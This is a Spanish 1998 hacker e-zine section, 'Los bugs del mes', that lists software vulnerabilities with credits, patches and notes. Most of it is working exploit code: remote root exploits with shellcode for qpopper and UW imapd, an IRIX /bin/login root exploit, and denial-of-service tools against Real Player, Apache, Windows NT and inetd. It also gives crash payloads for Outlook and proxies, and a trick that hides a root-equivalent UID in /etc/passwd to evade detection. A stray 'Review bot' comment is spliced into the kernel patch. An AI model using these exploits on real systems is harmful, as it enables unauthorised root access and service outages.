-[ 0x09 ]-------------------------------------------------------------------- -[ LOS BUGS DEL MES ]-------------------------------------------------------- -[ by SET Staff ]-----------------------------------------------------SET-16- -( 0x01 )- Para : Linux kernel Tema : SUID root sin SUID root Patch : Aqui mismito Creditos : Michal Zalewski <++> set_016/patches/linuxk --- linux/kernel/sys.c.orig Tue Apr 8 17:47:47 1997 +++ linux/kernel/sys.c Fri Jun 19 16:00:28 1998 @@ -237,6 +237,8 @@ { int old_rgid = current->gid; int old_egid = current->egid; + + if (rgid>0xffff || egid>0xffff) return -EINVAL; if (rgid != (gid_t) -1) { if ((old_rgid == rgid) || @@ -272,6 +274,8 @@ asmlinkage int sys_setgid(gid_t gid) { int old_egid = current->egid; + + if (gid>0xffff) return -EINVAL; if (suser()) current->gid = current->egid = current->sgid = current->fsgid = gid; @@ -489,6 +493,8 @@ asmlinkage int sys_setuid(uid_t uid) { int old_euid = current->euid; + + if (uid>0xffff) return -EINVAL; if (suser()) current->uid = current->euid = current->suid = current->fsuid = uid; @@ -510,6 +516,8 @@ asmlinkage int sys_setfsuid(uid_t uid) { int old_fsuid = current->fsuid; + + if (uid>0xffff) return -EINVAL; if (uid == current->uid || uid == current->euid || uid == current->suid || uid == current->fsuid || suser()) @@ -525,6 +533,8 @@ asmlinkage int sys_setfsgid(gid_t gid) { int old_fsgid = current->fsgid; + + if (gid>0xffff) return -EINVAL; if (gid == current->gid || gid == current->egid || gid == current->sgid || gid == current->fsgid || suser()) 
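Review bot: In the first hunk the new `if (rgid>0xffff || egid>0xffff) return -EINVAL;` runs before the existing `if (rgid != (gid_t) -1)` test, so the "leave this id unchanged" sentinel is rejected as out of range: with gid_t unsigned (as the article's description states), `(gid_t) -1` is far above 0xffff, and a setregid call passing -1 for one of the two ids now fails with EINVAL instead of changing only the other one. The function header is outside the hunk; from `old_rgid`/`old_egid` it appears to be sys_setregid. The guard should exempt the sentinel: `if ((rgid != (gid_t) -1 && rgid > 0xffff) || (egid != (gid_t) -1 && egid > 0xffff)) return -EINVAL;`. The other five hunks guard plain set* calls with no sentinel semantics and are unaffected, though the literal `0xffff` repeated in every hunk would read better as one named constant for the 16-bit id storage the check protects.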
@@ -563,6 +573,8 @@ asmlinkage int sys_setpgid(pid_t pid, pid_t pgid) { struct task_struct * p; + + if (pid>0xffff || pgid>0xffff) return -EINVAL; if (!pid) pid = current->pid; <--> Descripcion y Notas: Un error en la definicion de algunas variables que intervienen en la gestion del UID permite poseer una ID distinta de 0 y que para el sistema sea eficazmente ID 0 (root). El kernel almacena la ID en un word (2 bytes), lo que limita el ID al rango entre 0 y 65535. Sin embargo, el tipo definido para el manejo de UID y GID (uid_t) se declara como un entero sin signo, lo que le da la posibilidad de manejar IDs por encima de 65535. Por su parte, algunas llamadas al sistema, como sys_setuid(uid_t), truncan el valor de la ID a 2 bytes. De esta forma, si alteramos el fichero /etc/passwd de forma que nuestra ID sea 131072 (10 00000000 00000000), nuestra ID eficaz sera 0, es decir, los dos bytes menos significativos. Y como las utilidades para la deteccion de intrusos en el fichero /etc/passwd buscan por ID 0, pasamos desapercibidos. Tambien funciona en el caso de accesos restringidos desde el exterior. Es habitual no permitir el acceso remoto con privilegios de root. Con nuestra ID 131072, no tenemos privilegios, por lo que podemos acceder remotamente sin problemas, pero para el kernel nuestra ID es la del root. 
-( 0x02 )- Para : Qpopper 2.4x Tema : De todo un poco Patch : Actualizacion Creditos : Herbert Rosmanith <++> set_016/exploits/qpush.c /* qpush: qualcom popper buffer overflow exploit (pop_msg) * Mon Jun 29 01:26:06 GMT 1998 - herp * Herbert Rosmanith * herp@wildsau.idv.uni-linz.ac.at */ #include #include #include #include #include #include #include #include long addrlist[]={ 0xbfffeee4, /*2.2*/ 0xbfffeb80 /*2.41beta1*/ }; char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh........."; void die(char *s) { if (errno) perror(s); else fprintf(stderr,"%s\n",s); exit(-1); } void usage() { printf("qpush [-index] \n" " -0 QPOP Version 2.2 (default)\n" " -1 QPOP Version 2.41beta1\n"); exit(0); } int resolv(char *host,long *ipaddr) { if (isdigit(host[0])) { *ipaddr=inet_addr(host); if (*ipaddr==-1) return -1; } else { struct hostent *hp; if ((hp=gethostbyname(host))==NULL) { fprintf(stderr,"tc: %s: unknown host\n"); exit(-1); } *ipaddr=*(unsigned long *)hp->h_addr; } return 0; } int connect_to(char *hostname,short port) { struct sockaddr_in s_in; int s; s=socket(PF_INET,SOCK_STREAM,0); if (s==-1) die("socket"); if (resolv(hostname,(long *)&s_in.sin_addr.s_addr)==-1) die("unknown host"); s_in.sin_family=AF_INET; s_in.sin_port=htons(port); if (connect(s,(struct sockaddr *)&s_in,sizeof(s_in))==-1) die("connect"); return s; } void socket_read(int s,char *buf,int len) { int i; switch(i=read(s,buf,len)) { case -1: die("unexpected EOF"); case 0: die("EOF"); default: buf[i]=0; //printf("%s",buf); break; } } void terminal(int s) { char buf[1024]; fd_set rfds; fd_set fds; int i; for (i=0;i=2 && argv[1][0]=='-') { ix=atoi(&argv[1][1]); argc--; argv++; } else ix=0; if (argc!=2 || ix>sizeof(addrlist)/sizeof(long)) usage(); s=connect_to(argv[1],110); /* WKS POP3 */ socket_read(s,buf,sizeof(buf)); memset(buf,0x90,sizeof(buf)); for 
(i=981;i<981+10*4;i+=4) memcpy(&buf[i],&addrlist[ix],4); memcpy(&buf[941],shellcode,strlen(shellcode)); buf[sizeof(buf)-3]=0x0d; buf[sizeof(buf)-2]=0x0a; buf[sizeof(buf)-1]=0x00; write(s,buf,sizeof(buf)); socket_read(s,buf,sizeof(buf)); terminal(s); } <--> Descripcion y Notas: Menuda se ha montado este verano con el qpopper. Nadie se aclara. Por un lado buffers overflow, por otro core dumps, y no pueden faltar cualquier otro tipo de anomalias. Pese a que el fallo original parece afectar a las implementacions en diferentes sistemas operativos, el exploit que os dejamos solo funciona para la version de Linux, excepto para la Debian con el QPop v2.2 Al final los de Qualcomm han sacado por fin una version nueva, aparentemente sin el fallo que ha generado tanto revuelo. Para conseguirla: ftp://ftp.qualcomm.com/oldeudora/servers/unix/popper/qpopper2.5.tar.Z -( 0x03 )- Para : Linux 2.0.34 inetd Tema : Matar el inetd Patch : Kernel 2.0.35 Creditos : David Luyer <++> set_016/exploits/inetdkill.c #include #include #include #include #include int main(int argc, char *argv[]) { int s, p; if(argc != 2) { fputs("Please specify a pid to send signal to.\n", stderr); exit(0); } else { p = atoi(argv[1]); } fcntl(0,F_SETOWN,p); s = fcntl(0,F_GETFL,0); fcntl(0,F_SETFL,s|O_ASYNC); printf("Sending SIGIO - press enter.\n"); getchar(); fcntl(0,F_SETFL,s&~O_ASYNC); printf("SIGIO send attempted.\n"); return 0; } <--> Descripcion y Notas: La ejecucion de este codigo en un Linux con el kernel 2.0.34, se tengan o no privilegios, mata el demonio inetd. En aquellos sistemas que no usen glibc, debe a¤adirse la linea: #define O_ASYNC FASYNC -( 0x04 )- Para : Red Hat 4.2, 5.0 y 5.1 Tema : Programas con agujeros Patch : Actualizarse Creditos : twiztah Descripcion y Notas: Algunos de los binarios que se instalan con las distribuciones de Red Hat que hemos mencionado presentan problemas de seguridad importantes, por lo que se recomienda actualizarse a las nuevas versiones. 
Los programas afectados son: bind, libtermcap, tin, slang, metamail, mailx y dosemu. Las actualizaciones (para la 5.1) las teneis disponibles en: ftp://ftp.redhat.com/updates/5.1/i386/metamail-2.7-17.i386.rpm ftp://ftp.redhat.com/updates/5.1/i386/mailx-8.1.1-3.i386.rpm ftp://ftp.redhat.com/updates/5.1/i386/bind-4.9.7-1.i386.rpm ftp://ftp.redhat.com/updates/5.1/i386/slang-0.99.38-7.i386.rpm ftp://ftp.redhat.com/updates/5.1/i386/tin-1.22-11.i386.rpm ftp://ftp.redhat.com/updates/5.0/i386/dosemu-0.66.7-7.i386.rpm ftp://ftp.redhat.com/updates/5.0/i386/libtermcap-2.0.8-9.i386.rpm Los usuarios de las distribuciones 5.0 y 4.2 las encontrareis en: ftp://ftp.redhat.com/updates/5.0/i386/ ftp://ftp.redhat.com/updates/4.2/i386/ Los nombres de los ficheros son los mismos, variando la version de la actualizacion. Existen tambien actualizaciones para alpha y sparc en los directorios correspondientes. -( 0x05 )- Para : Proxy en Windows 95 Tema : Cuelgue del proxy Patch : Supongo que en las paginas oficiales Creditos : Ryan Nichols Descripcion y Notas: Solo dos son los programas proxy afectados en esta ocasion: WinGate y Startech. En ambos casos el procedimiento es similar. Comenzamos haciendo un telnet al puerto pop3 del proxy. En el caso de ser WinGate, teclearemos: USER x#99999..... Con todos los '9' que podamos. De tratarse de Startech, tecleamos: USER x<9999...> De nuevo con todos los '9' posibles. El resultado es el mismo. -( 0x06 )- Para : Real Player 5 Tema : Cuelgue del real Player Patch : En la ultima version Creditos : Kit Knox <++> set_016/exploits/rpkiller.c /* * Real Player Killer - 6/26/98 * * (C) 1998 Kit Knox * * [ http://www.rootshell.com/ ] * * Real Player 5.0 for Windows95 and Linux (others untested) do not check * the validity of incoming UDP packets used when receiving audio/video. * * If you are able to determine or brute force the destination port of the * stream you are able to crash the player and cause it to use 100% of * idle CPU. 
I would not be surprised if there are numerous buffer * overflows in this area as well. The client does not even check if the * source IP address is the one it is receiving data from. Any source IP * can be used. * * Generally the stack will start with port 1025 and go up. Starting there * and going up will generally give you good results. If you are able to * sniff the network you will know the exact port and not have to guess. * */ #include #include #include #include #include #include #include #include #include #include #include #define err(x) { fprintf(stderr, x); exit(1); } #define errs(x, y) { fprintf(stderr, x, y); exit(1); } char real_data[] = { 0x00, 0x00 }; unsigned short in_cksum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } int sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; char crashme[500]; int i; ip.ihl = 5; ip.version = 4; ip.tos = rand () % 100;; ip.tot_len = htons (28 + datalen); ip.id = htons (31337 + (rand () % 100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum ((char *) &ip, sizeof (ip)); udp.source = htons (sport); udp.dest = htons (dport); udp.len = htons (8 + datalen); udp.check = (short) 0; memcpy (packet, (char *) &ip, sizeof (ip)); memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen); for (i = 0; i < 500; i++) crashme[i] = rand () % 255; memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, 
crashme, 500); return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0, (struct sockaddr *) sin, sizeof (struct sockaddr_in))); } unsigned int lookup (host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1) { he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); } return (addr); } void main (argc, argv) int argc; char **argv; { unsigned int saddr, daddr; struct sockaddr_in sin; int s, i; if (argc != 5) errs ("Usage: %s \n", argv[0]); printf("Real Player Killer - http://www.rootshell.com/\n\n"); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if (!(saddr = lookup (argv[1]))) err ("Unable to lookup source address.\n"); if (!(daddr = lookup (argv[2]))) err ("Unable to lookup destination address.\n"); sin.sin_family = AF_INET; sin.sin_port = 9; sin.sin_addr.s_addr = daddr; for (i=atoi(argv[3]); i -( 0x07 )- Para : SlackWare 3.4 /bin/login Tema : Acceso modo root Patch : /etc/groups Creditos : Richard Thomas Descripcion y Notas: Cada vez nos lo ponen mas simple. En esta ocasion, si accedemos a un SlackWare que no tiene el fichero /etc/groups directamente conseguimos UID 0 GID 0... root access granted ;) -( 0x08 )- Para : IRIX 6.3 y 6.4 Tema : Sobrecarga del procesador Patch : Uhmmm! Creditos : Matthew Potter Descripcion y Notas: Tan simple como ejecutar: finger -l @@@@@@@@@@@@@@@@@@@@@destino@bounce_host donde debe haber unas 500 @ Entonces la maquina destino sufre una sobrecarga de procesos importante. -( 0x09 )- Para : UW impad (Pine 4.0) Tema : Root access entre otras cosas Patch : Aqui y en la UW Creditos : Cheez Whiz <++> set_016/exploits/imappy.c /** *** i386 BSD remote root exploit for UW imapd IMAP 4.1 server *** *** This is *not* the same bug addressed in CERT Advisory CA-97.09! 
*** *** Usage: % (imappy nop esp offset; cat) | nc hostname 143 *** *** where nop is the number of NOP opcodes to place at the start of the *** exploit buffer (I use 403), esp is the %esp stack pointer value, and *** offset is the number of bytes to add to esp to calculate your target *** %eip. *** *** Demonstration values for UW imapd 10.234 (part of Pine 4.00): *** *** imappy 403 0xefbfd5e8 100 (BSDI 3.0) *** imappy 403 0xefbfd4b8 100 (FreeBSD 2.2.5) *** *** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER *** *** Cheez Whiz *** cheezbeast@hotmail.com *** *** July 16, 1998 **/ #include #include #include #include #define BUFLEN (2*1024) #define NOP 0x90 char shell[] = /* 0 */ "\xeb\x34" /* jmp springboard */ /* start: */ /* 2 */ "\x5e" /* popl %esi */ /* 3 */ "\x8d\x1e" /* leal (%esi),%ebx */ /* 5 */ "\x89\x5e\x0b" /* movl %ebx,0xb(%esi) */ /* 8 */ "\x31\xd2" /* xorl %edx,%edx */ /* 10 */ "\x89\x56\x07" /* movl %edx,0x7(%esi) */ /* 13 */ "\x89\x56\x0f" /* movl %edx,0xf(%esi) */ /* 16 */ "\x89\x56\x14" /* movl %edx,0x14(%esi) */ /* 19 */ "\x88\x56\x19" /* movb %dl,0x19(%esi) */ /* 22 */ "\x31\xc0" /* xorl %eax,%eax */ /* 24 */ "\xb0\x7f" /* movb $0x7f,%al */ /* 26 */ "\x20\x46\x01" /* andb %al,0x1(%esi) */ /* 29 */ "\x20\x46\x02" /* andb %al,0x2(%esi) */ /* 32 */ "\x20\x46\x03" /* andb %al,0x3(%esi) */ /* 35 */ "\x20\x46\x05" /* andb %al,0x5(%esi) */ /* 38 */ "\x20\x46\x06" /* andb %al,0x6(%esi) */ /* 41 */ "\xb0\x3b" /* movb $0x3b,%al */ /* 43 */ "\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */ /* 46 */ "\x89\xca" /* movl %ecx,%edx */ /* 48 */ "\x52" /* pushl %edx */ /* 49 */ "\x51" /* pushl %ecx */ /* 50 */ "\x53" /* pushl %ebx */ /* 51 */ "\x50" /* pushl %eax */ /* 52 */ "\xeb\x18" /* jmp exec */ /* springboard: */ /* 54 */ "\xe8\xc7\xff\xff\xff" /* call start */ /* data: */ /* 59 */ "\x2f\xe2\xe9\xee\x2f\xf3\xe8" /* DATA (disguised /bin/sh) */ /* 66 */ "\x01\x01\x01\x01" /* DATA */ /* 70 */ "\x02\x02\x02\x02" /* DATA */ /* 74 */ "\x03\x03\x03\x03" /* DATA */ /* 
exec: */ /* 78 */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall 0x7,0x0 */ char buf[BUFLEN]; unsigned long int nop, esp; long int offset; void main (int argc, char *argv[]) { int i; if (argc < 4) { printf("usage: %s nop esp offset\n", argv[0]); return; } nop = strtoul(argv[1], NULL, 0); esp = strtoul(argv[2], NULL, 0); offset = strtol(argv[3], NULL, 0); memset(buf, NOP, BUFLEN); memcpy(buf+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4) *((int *) &buf[i]) = esp + offset; printf("* AUTHENTICATE {%d}\r\n", BUFLEN); for (i = 0; i < BUFLEN; i++) putchar(buf[i]); printf("\r\n"); return; } <--> Descripcion y Notas: Un error en la implementacion del imapd que se distribuye conjuntamente al Pine 4.0, permite, entre otras cosas, conseguir accesos no autorizados de forma remota. El parche lo distribuye la Universidad de Washington, con la numeracion 10234, como el original. De todas formas, basta con cambiar el codigo de la funcion mail_auth() de mail.c que se distribuye por el siguiente para evitar el problema <++> set_016/patches/imapd.c char *mail_auth (char *mechanism,authresponse_t resp,int argc,char *argv[]) { char tmp[MAILTMPLEN]; AUTHENTICATOR *auth; /* cretins still haven't given up */ if (strlen (mechanism) >= MAILTMPLEN) syslog (LOG_ALERT|LOG_AUTH,"System break-in attempt, host=%.80s", tcp_clienthost ()); else { /* make upper case copy of mechanism name */ ucase (strcpy (tmp,mechanism)); for (auth = mailauthenticators; auth; auth = auth->next) if (auth->server && !strcmp (auth->name,tmp)) return (*auth->server) (resp,argc,argv); } return NIL; /* no authenticator found */ } <--> Si lo preferis, podeis obtener la version ya parcheada en: ftp://ftp.cac.washington.edu/mail/imap.tar.Z -( 0x0A )- Para : who Tema : Lo que se os ocurra Patch : A ver, a ver... Creditos : Paul Boehm Descripcion y Notas: En algunos sistemas, who se encuentra en el grupo de los programas privilegiados, que, por ejemplo, pueden leer el utmp. 
Ejecutando who con algunos truquitos, podemos hacer casi de todo. Por ejemplo, en RedHat 5.1 ejecutar who /bin/bash el sistema se cuelga. En FreeBSD puede usarse para ver ficheros pertenecientes al mismo grupo que who, de la forma who /fichero -( 0x0B )- Para : PovRay 3.02 Tema : Acceso root Patch : Ya veremos Creditos : Luke Descripcion y Notas: Al instalar el PovRay 3.02 para linux, la libreria s-povray tiene que tener suid root para poder ejecutarse sin problemas (acceso a /dev/console). El problema surge cuando desde la shell damos un nombre de fichero largo, resultando en un segmentation fault. Ejemplo: [root@hazard root]# s-povray -I`perl -e "print 'A'x1000"` -( 0x0C )- Para : Internet Explorer 4.0 Tema : System Crash entre otros Patch : Mozilla rulez !!! Creditos : Varios Descripcion y notas: Por una parte, tenemos que si incluimos la etiqueta en una pagina HTML y la cargamos con el Explorer, podemos hacer desde que el explorer se cierre hasta llegar al pantallazo azul. Pero para ello, la etiqueta debe llevar algo especial. Veamos: Segun como le de al sistema, pasara una cosa u otra. Tambien tenemos el siguiente codigo: <++> set_016/exploits/ie4.html Adios IE 4.0 <--> -( 0x0D )- Para : Microsoft Outlook Tema : Overflow Patch : Microsoft?!?!?! LINUX !!!! Creditos : Ryan Veety Descripcion y Notas: Un mensaje que contenga: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="204-1969819122-901726347=:19806" This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. 
--204-1969819122-901726347=:19806 Content-Type: TEXT/PLAIN; charset=US-ASCII test --204-1969819122-901726347=:19806 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Don't read this text file --204-1969819122-901726347=:19806-- Cuelga el Outlook, dando un error en la direccion 0x41414141 (AAAA) -( 0x0E )- Para : Apache Tema : Crash Patch : http://www.apache.org Creditos : Dag-Erling Coidan Smirgrav <++> /set_016/exploits/sioux.c /*- * Copyright (c) 1998 Dag-Erling Coidan Smirgrav * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. 
Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer * in this position and unchanged. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software withough specific prior written permission * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
* */ /* * Kudos to Mark Huizer who originally suggested this on freebsd-current */ #include #include #include #include #include #include #include #include void usage(void) { fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n"); exit(1); } int main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; FILE *f; int o, sd; /* default parameters */ char *addr = "localhost"; int port = 80; int num = 1000; /* get options */ while ((o = getopt(argc, argv, "a:p:n:")) != EOF) switch (o) { case 'a': addr = optarg; break; case 'p': port = atoi(optarg); break; case 'n': num = atoi(optarg); break; default: usage(); } if (argc != optind) usage(); /* connect */ if ((he = gethostbyname(addr)) == NULL) { perror("gethostbyname"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family = he->h_addrtype; sin.sin_port = htons(port); if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); exit(1); } if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("connect"); exit(1); } if ((f = fdopen(sd, "r+")) == NULL) { perror("fdopen"); exit(1); } /* attack! */ fprintf(stderr, "Going down like a plague of locusts on %s\n", addr); fprintf(f, "GET / HTTP/1.1\r\n"); while (num-- && !ferror(f)) fprintf(f, "User-Agent: sioux\r\n"); if (ferror(f)) { perror("fprintf"); exit(1); } fclose(f); exit(0); } <--> -( 0x0F )- Para : Irix 6.3 Tema : root access Patch : Donde siempre... 
SGI lo tiene, y nosotros tambien Creditos : David Hedley <++> set_016/exploits/login.c /* /bin/login exploit by DCRH 24/5/97 * * Tested on: R3000 Indigo (Irix 5.3) * R4400 Indy (Irix 5.3) * R5000 O2 (Irix 6.3) * R8000 Power Challenge (Irix 6.2) * * Compile as: cc -n32 login.c (for Irix 6.x) * cc login.c (for Irix 5.x) * * Press enter when prompted for a password * */ #include #include #include #include #include #define BUF_LENGTH 200 #define EXTRA 300 #define OFFSET 0x1b0 #define IRIX_NOP 0x03e0f825 /* move $ra,$ra */ #define u_long unsigned u_long get_sp_code[] = { 0x03a01025, /* move $v0,$sp */ 0x03e00008, /* jr $ra */ 0x00000000, /* nop */ }; u_long irix_shellcode[] = { 0x24041234, /* li $4,0x1234 */ 0x2084edcc, /* sub $4,0x1234 */ 0x0491fffe, /* bgezal $4,pc-4 */ 0x03bd302a, /* sgt $6,$sp,$sp */ 0x23e4012c, /* addi $4,$31,264+36 */ 0xa086feff, /* sb $6,-264+7($4) */ 0x2084fef8, /* sub $4,264 */ 0x20850110, /* addi $5,$4,264+8 */ 0xaca4fef8, /* sw $4,-264($5) */ 0xaca6fefc, /* sw $4,-260($5) */ 0x20a5fef8, /* sub $5, 264 */ 0x240203f3, /* li $v0,1011 */ 0x03ffffcc, /* syscall 0xfffff */ 0x2f62696e, /* "/bin" */ 0x2f7368ff, /* "/sh" */ }; char buf[BUF_LENGTH + EXTRA + 8]; void main(int argc, char **argv) { char *env[] = {NULL}; u_long targ_addr, stack; u_long *long_p; int i, code_length = strlen((char *)irix_shellcode)+1; u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code; stack = get_sp(); long_p =(u_long *) buf; targ_addr = stack + OFFSET; if (argc > 1) targ_addr += atoi(argv[1]); while ((targ_addr & 0xff000000) == 0 || (targ_addr & 0x00ff0000) == 0 || (targ_addr & 0x0000ff00) == 0 || (targ_addr & 0x000000ff) == 0) targ_addr += 4; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = IRIX_NOP; for (i = 0; i < code_length/sizeof(u_long); i++) *long_p++ = irix_shellcode[i]; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = (targ_addr << 24) | (targ_addr >> 8); *long_p = 0; printf("stack = 0x%x, targ_addr = 0x%x\n", stack, 
targ_addr); execle("/bin/login", "login", "-h", &buf[1], 0, env); perror("execl failed"); } <--> Descripcion y Notas: Cuando se ejecuta el exploit, nos pide una clave. Le damos a enter sin teclear nada y estamos dentro con privilegios de root. El patch es tan sencillo como ejecutar: chmod u-s /bin/login -( 0x10 )- Para : Windows NT 4.0 Tema : Crash Patch : Maybe SP3, Maybe LINUX Creditos : Bob Beck <++> set_016/exploits/nt.pl #!/usr/local/bin/perl use Socket; use FileHandle; require "chat2.pl"; $ILoveBill = $ARGV[0] && shift; $verbose = 0; # tell me what you're hitting $knownports = 0; # don't hit known problem ports for ($port = $0; $port<65535; $port++) { if ($knownports && ($port == 135 || $port== 1031)) { next; } $fh = chat::open_port($ILoveBill, $port); chat::print ($fh,"Windows NT is the platform of the future"); if ($verbose) { print "Trying port: $port\n\n"; } chat::close($fh); } <--> Descripcion y Notas: Pues el mismo problema de siempre, el clasico con el puerto 135, el origen de los nukes... pero en el puerto 1031, esto es, inetinfo. Creo que ya lo hemos dicho en mas de una ocasion... Pero sigue fallando.